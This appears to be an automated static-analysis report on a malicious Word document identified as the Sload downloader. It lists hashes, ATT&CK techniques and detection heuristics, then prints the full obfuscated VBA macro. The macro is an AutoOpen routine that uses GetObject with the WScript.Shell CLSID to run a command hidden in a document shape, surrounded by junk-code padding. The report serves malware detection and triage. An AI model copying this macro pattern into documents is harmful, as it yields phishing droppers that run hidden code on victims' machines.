Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e597f631d1c73045…

MALICIOUS

Office (OLE)

147.4 KB Created: 2018-11-28 09:45:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 2a1c615a6657761173ecd3af7870b45c SHA-1: a965060f6cc6b1caa988c27451e6c0b0e1a4b3f2 SHA-256: e597f631d1c73045ff24a9ad51c463336ca03983d80c7cf1e719b99d067329fe
252 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic T1218.005 System Binary Proxy Execution: Mshta T1566.001 Spearphishing Attachment

The sample contains VBA macros that trigger on AutoOpen, indicating a malicious document. Critical heuristics indicate the use of WScript.Shell to instantiate a dangerous COM class and a reference to PowerShell. The obfuscated VBA code likely attempts to download and execute a second-stage payload, possibly using mshta.exe as suggested by the reconstructed command.

Heuristics 9

  • ClamAV: Doc.Malware.Sload-6791731-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sload-6791731-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUS
    VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
    Matched line in script
    Next
    Set OXVvXFKL = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bSZGDN + QcbRM + zzrObkp + zFjIB)
       On Error Resume Next
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Next
    Set OXVvXFKL = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bSZGDN + QcbRM + zzrObkp + zFjIB)
       On Error Resume Next
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub AutoOpen()
       On Error Resume Next
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8742 bytes
SHA-256: da24bb15a60194cd66c5415a9e0e661d8a96b851fa45402824f8d4547a1e201d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
208 of 295 identifiers look randomly generated (e.g. 'osktKaFUXp') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "vhzBiAsI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
Select Case izViuOZ
      Case 268899346
         maoSU = CBool(FvEonQo)
         XoMRQ = 334475000
      Case 245552943
         EalQcfoGw = Atn(ElwQYj)
         icAjK = Atn(119083460 * CLng(36534801))
   End Select
         For Each vwphzIqZv In OhDzZHz
         WLDEGPfJi = kKtHfWh * CDate(wYAIOMCu * zDlCsi) * vtqqrZ / Sin(naTok) / GChPsIZ + 276062484 - 94294734 + Chr(322851336) + (BLEjFzTsc * MlfrpYW)
Next
   On Error Resume Next
Select Case YoNTpTtW
      Case 104436401
         uPFEIBCIR = CBool(jjAECaEnu)
         wPFiKo = 226015111
      Case 299598317
         UoibiaKR = Atn(GWvvSZDr)
         IRPPFbAB = Atn(202386975 * CLng(67058912))
   End Select
         For Each tTSIWwJ In EVisI
         hYTBzj = TAZbXFiC * CDate(dvzurmD * YVQwmSiZ) * uYDhz / Sin(drZTtjzq) / CdsisNc + 308353349 - 140745332 + Chr(210210827) + (bQhhhvC * KKzudO)
Next
   On Error Resume Next
Select Case CjtjpObWC
      Case 341386355
         lXHNK = CBool(rwjAP)
         bNXwWjG = 85682922
      Case 205692240
         jRarkLJVl = Atn(mNjnDjJ)
         FitzmLSTR = Atn(117835737 * CLng(34744277))
   End Select
         For Each wmavqpnTV In mLPllNik
         nWPHBwjfO = RtrQvhz * CDate(nwNvqVZr * hAZEpjYS) * jfZwHK / Sin(tEmvvUE) / aqnfrjui + 64035469 - 94693720 + Chr(10399320) + (oVbNSzb * UNopC)
Next
   On Error Resume Next
Select Case tHIItZ
      Case 218004345
         bpAZta = CBool(aLiGBW)
         SKmYUdz = 66299889
      Case 80709632
         jlpHMNRl = Atn(zzNvBszwa)
         omfvR = Atn(265656441 * CLng(327590924))
   End Select
         For Each UFDPRdN In HkENzRUGX
         FOkjWhX = YzDqY * CDate(Prwjrj * khLkNsML) * RYXmjjl / Sin(iVsRFNmR) / lwGUoP + 260287876 - 336874450 + Chr(139337713) + (ZvJpKpBi * SljjGIwV)
Next
Set uYSTEzWV = Shapes("IHEZACs")
   On Error Resume Next
Select Case NjFXKkiWC
      Case 325245663
         ijjJPh = CBool(GKzSIh)
         hBXUGohOf = 82251888
      Case 24770817
         bnpLULRCi = Atn(czitKTju)
         YXjcjGBwI = Atn(219142162 * CLng(100636164))
   End Select
         For Each UFZGZ In zdGqfM
         ZZlMiOikR = RuKFFSO * CDate(VPjHs * nlChR) * isUjJjQk / Sin(TjUCaHL) / LtLrhJ + 320707644 - 103654818 + Chr(115368512) + (bYsLAScw * aiwYCii)
Next
   On Error Resume Next
Select Case QKjVz
      Case 43045712
         HBAuhFnUm = CBool(BrnpHObVV)
         jBzcIqZbq = 17823492
      Case 87185052
         CJMtiuw = Atn(VjPiCDpUJ)
         EAbLTGCYm = Atn(280736370 * CLng(209717939))
   End Select
         For Each ijmXoi In NkhWYZz
         UZEBESuz = CqpGrF * CDate(IRJFf * iOLrwKXdC) * WUhwhpbt / Sin(lZVzoWVi) / OHPsGcu + 274905225 - 275560770 + Chr(83049922) + (jajzETm * GZSpP)
Next
   On Error Resume Next
Select Case kPHwU
      Case 188777673
         HAvSTjX = CBool(vjVQMiM)
         VTcqJ = 4474450
      Case 194759069
         wAPHfwhz = Atn(KiXJkNm)
         OaCGW = Atn(79778352 * CLng(160164887))
   End Select
         For Each JmcrlNG In OUTRPzz
         WoBwowlFq = vabZbnrj * CDate(JFHqzbA * PtUoQaDki) * biMBXB / Sin(SjvosfZfb) / tOzDVoBVM + 140016978 - 331826834 + Chr(201885707) + (YotcPBJHi * rfuEF)
Next
osktKaFUXp = "" + FRBbX + GwBjXQsz + lHjBa + kkPVINC + uYSTEzWV.TextFrame.TextRange.Text + DMPZwV + MjvpDN + NTtvCL
   On Error Resume Next
Select Case WlGaJQQU
      Case 14565301
         pQzVwIHI = CBool(vWZwkfnW)
         HwpjDbVw = 137995964
      Case 212908756
         SbaMIIzwi = Atn(jrvwMNw)
         VuWudNFw = Atn(60217634 * CLng(81824038))
   End Select
         For Each ACnbMPU In NnciqsObF
         jrOYHzlZY = NGJwkbiWt * CDate(ihsQjA * LjBPlAEZV) * bvopn / Sin(WiGidwPOr) / pLCwzpGF + 169325134 - 295893508 + Chr(146527766) + (bFFZPUCb * ZvqWi)
Next
   On Error Resume Next
Select Case cczLfVbJ
      Case 176276797
         cJutZFsES = CBool(fiGMAqjv)
         GGQrvnk = 247390719
      Case 201777419
         GGAzwktz = Atn(qhdFhj)
         tVlKo = Atn(251584830 * CLng(211695749))
   End Select
         For Each TpMSzGpT In XMfilH
         HsRFvcB = IstOATrT * CDate(TdJXbwL * NQhVD) * INJDvUa / Sin(rodJGNaT) / fsEKIwEfu + 43565885 - 27666506 + Chr(222339585) + (TNEVlB * QvzzimUtR)
Next
   On Error Resume Next
Select Case fHzdMGW
      Case 8242733
         tRjuli = CBool(tKwFtPoC)
         AdrmqkpH = 181229746
      Case 321342769
         ihAzmc = Atn(zABJXFC)
         iwjkPTwzM = Atn(189022450 * CLng(202135788))
   End Select
         For Each aIccTo In FLJBTQ
         qCiqGlkwC = arhuikoUH * CDate(wpYYqi * zhYuNTXd) * SVWtidFiC / Sin(HWXaUhL) / vBdGA + 152156923 - 316802110 + Chr(257970484) + (iwMYJR * STzOjSjp)
Next
Set OXVvXFKL = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bSZGDN + QcbRM + zzrObkp + zFjIB)
   On Error Resume Next
Select Case CElfaY
      Case 62706517
         CaRPXKYG = CBool(Jhjtd)
         tzOwHF = 21487974
      Case 92277803
         wcvztY = Atn(bztaJnE)
         vctXm = Atn(226330532 * CLng(228305583))
   End Select
         For Each YqriMa In dzMDQ
         OaNhnGjzD = GsICf * CDate(fbfPIW * BqKAz) * bwjnLj / Sin(fqzbB) / UmkqDX + 149034467 - 117146679 + Chr(129961640) + (XAmrTLrc * ikcHX)
Next
Const ipSCmF = 0
   On Error Resume Next
Select Case LZzww
      Case 169309393
         kimjfz = CBool(DGHzDZqt)
         DaACsStw = 238053714
      Case 209070610
         jWGApIcPp = Atn(JhbTG)
         dtiBRSut = Atn(146135219 * CLng(311932530))
   End Select
         For Each bRpqzAA In jAGHv
         aDYutZimj = CFihOc * CDate(iulBwz * KhaLZj) * liEqOVz / Sin(Vopiant) / TtEncNK + 309255484 - 187528254 + Chr(26041690) + (kLwWM * sRWZqAGNB)
Next
   On Error Resume Next
Select Case BfjhsItP
      Case 201060592
         YVUjLbB = CBool(muQfMlij)
         YjADFbp = 257050929
      Case 220102396
         ilUZkNfSi = Atn(JmoaJFE)
         WTwDIi = Atn(139072756 * CLng(234497440))
   End Select
         For Each VStfwdc In uSUjRhS
         GTlrauAXV = OAbcpE * CDate(jJzpw * ILDOnj) * ElfICLjr / Sin(bSVJf) / bvRcPf + 229547790 - 161075755 + Chr(125047724) + (HFdfW * NoiLcVTa)
Next
   On Error Resume Next
Select Case rVcHmVwLR
      Case 165092232
         uLpEivEJ = CBool(EOAbhMcA)
         AZzjaHBtL = 327189517
      Case 150085079
         CThUzZpG = Atn(rufKqcVA)
         ZtwTRzh = Atn(72769006 * CLng(249244612))
   End Select
         For Each CpjGnFBu In HimmuG
         iTYki = slXdmjCh * CDate(onHDwIos * oiCtr) * GBMJUNmB / Sin(WwwiJ) / SslTuz + 205039892 - 278859205 + Chr(66489144) + (qaTvw * zukXlWt)
Next
   On Error Resume Next
Select Case DjpozQb
      Case 135559299
         fzTwZPK = CBool(wWhWW)
         abzATJwAG = 123948729
      Case 250959929
         uPbwvsO = Atn(hzpwfJ)
         ZIsnw = Atn(219392154 * CLng(276894936))
   End Select
         For Each NzQHLi In rAKwUud
         apIBJ = lDVKEXr * CDate(fntEzN * fkDqBGpmj) * JvFSzqfj / Sin(buuzGGnd) / WFQuPEv + 32917837 - 31400386 + Chr(75411343) + (XwQoW * cmuhzNXNm)
Next
   On Error Resume Next
Select Case RfXPw
      Case 331273846
         clNNGdiE = CBool(ZkSWaP)
         iVQRMCM = 5533935
      Case 206096767
         wLMaiaF = Atn(JAGJd)
         kiqvqW = Atn(302174151 * CLng(227870935))
   End Select
         For Each Dotjj In ZZMijjT
         luKNQROVZ = wjiMQKIcO * CDate(JlktY * jbtbtlRm) * BjJcQ / Sin(hPBizpNI) / ZHSKi + 2620546 - 67353657 + Chr(109089789) + (kimbzwNP * IPiwzzVbV)
Next
OXVvXFKL.Run# osktKaFUXp, ipSCmF
   On Error Resume Next
Select Case jXVizq
      Case 283743391
         YUUXWNT = CBool(hipktz)
         LQofBYn = 283266474
      Case 299920648
         lNObiG = Atn(bdoGA)
         lFwHs = Atn(165923603 * CLng(142252333))
   End Select
         For Each VjwKNLL In BldbLkzF
         zbjJPLTL = CaFQu * CDate(XhQdPQ * vzlbDdZ) * AFqXtzpUF / Sin(fwDIljk) / LDdUWpSij + 232538690 - 156906645 + Chr(261687065) + (plOBU * tBUiNK)
Next
   On Error Resume Next
Select Case MtwwGaiM
      Case 243799386
         Ntjrk = CBool(hBBMbdsj)
         Ddscij = 105893297
      Case 74548497
         MztjXZjEX = Atn(fBvIcSz)
         jLMjBSdDw = Atn(248919421 * CLng(236078397))
   End Select
         For Each Zzhhf In mzicfWFX
         SIVQK = ljzmcvb * CDate(TduVQ * hUNcpjBQG) * qdiQKvaV / Sin(bnQhuDr) / rKzlBo + 178358327 - 132519088 + Chr(334010902) + (tbdcVaUwz * KvYCYv)
Next
End Sub